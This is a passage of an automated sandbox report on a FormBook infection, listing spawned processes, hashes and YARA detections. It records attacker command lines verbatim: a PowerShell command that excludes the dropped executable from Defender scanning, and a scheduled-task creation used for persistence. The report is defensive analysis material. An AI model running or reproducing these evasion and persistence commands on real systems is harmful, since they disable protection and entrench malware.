                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Target ID:4
                                                Start time:06:28:17
                                                Start date:11/08/2022
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe
                                                Imagebase:0xb70000
                                                File size:430592 bytes
                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                Target ID:5
                                                Start time:06:28:17
                                                Start date:11/08/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7c9170000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Target ID:6
                                                Start time:06:28:17
                                                Start date:11/08/2022
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp
                                                Imagebase:0xc30000
                                                File size:185856 bytes
                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Target ID:7
                                                Start time:06:28:21
                                                Start date:11/08/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7c9170000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Target ID:8
                                                Start time:06:28:23
                                                Start date:11/08/2022
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                Imagebase:0xe50000
                                                File size:45152 bytes
                                                MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                Target ID:11
                                                Start time:06:28:27
                                                Start date:11/08/2022
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff6b8cf0000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                Target ID:24
                                                Start time:06:28:57
                                                Start date:11/08/2022
                                                Path:C:\Windows\SysWOW64\autofmt.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                Imagebase:0xe0000
                                                File size:831488 bytes
                                                MD5 hash:7FC345F685C2A58283872D851316ACC4
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                Target ID:25
                                                Start time:06:28:57
                                                Start date:11/08/2022
                                                Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                Imagebase:0x370000
                                                File size:32768 bytes
                                                MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                No disassembly